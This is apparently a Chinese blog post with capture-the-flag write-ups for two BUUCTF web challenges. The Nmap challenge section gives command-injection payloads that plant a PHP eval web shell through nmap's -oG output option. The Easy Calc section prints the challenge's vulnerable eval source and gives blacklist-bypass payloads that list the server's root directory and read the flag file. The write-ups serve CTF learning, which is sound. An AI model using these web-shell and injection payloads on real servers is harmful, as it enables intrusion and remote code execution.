BUUCTF(8)

XINO
121 阅读1分钟

持续创作,加速成长!这是我参与「掘金日新计划 · 6 月更文挑战」的第11天,点击查看活动详情

[网鼎杯 2020 朱雀组]Nmap

考察nmap的利用

选项 解释
-oN 标准保存
-oX XML保存
-oG Grep保存
-oA 保存到所有格式
-append-output 补充保存文件

考虑到之前另一个题

payload

127.0.0.1 | ' <?php @eval($_POST["hack"]);?> -oG hack.php'

回显hacker,经查,php被过滤,使用短标签绕过

	' <?= @eval($_POST["hack"]);?> -oG hack.phtml '

[RoarCTF 2019]Easy Calc

源代码

<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <title>简单的计算器</title>
  
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="./libs/bootstrap.min.css">
  <script src="./libs/jquery-3.3.1.min.js"></script>
  <script src="./libs/bootstrap.min.js"></script>
</head>
<body>
<div class="container text-center" style="margin-top:30px;">
  <h2>表达式</h2>
  <form id="calc">
    <div class="form-group">
      <input type="text" class="form-control" id="content" placeholder="输入计算式" data-com.agilebits.onepassword.user-edited="yes">
    </div>
    <div id="result"><div class="alert alert-success">
            </div></div>
    <button type="submit" class="btn btn-primary">计算</button>
  </form>
</div>
<!--I've set up WAF to ensure security.-->
<script>
    $('#calc').submit(function(){
        $.ajax({
            url:"calc.php?num="+encodeURIComponent($("#content").val()),
            type:'GET',
            success:function(data){
                $("#result").html(`<div class="alert alert-success">
            <strong>答案:</strong>${data}
            </div>`);
            },
            error:function(){
                alert("这啥?算不来!");
            }
        })
        return false;
    })
</script>
</body></html>

审计发现其他源码

calc.php

<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n',''', '"', '`', '[', ']','$','\','^'];
        foreach ($blacklist as $blackitem) {
                if (preg_match('/' . $blackitem . '/m', $str)) {
                        die("what are you want to do?");
                }
        }
        eval('echo '.$str.';');
}
?>

分析一下,传一个名为num的参数,黑名单过滤,推测是waf,过滤了特殊字符,尝试发现存在字符也会被直接过滤

经过以前的刷题经验与之前的例题

在传参数之间加一个空格即可绕过

例如

? num=phpinfio(); 这样可以进行绕过

我们构造payload读取目录

? num=var_dump(scandir(chr(47)))

/被过滤了,我们使用ascii码将其替换

发现f1agg文件,猜测其在该文件下面

? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
avatar
文章
阅读
粉丝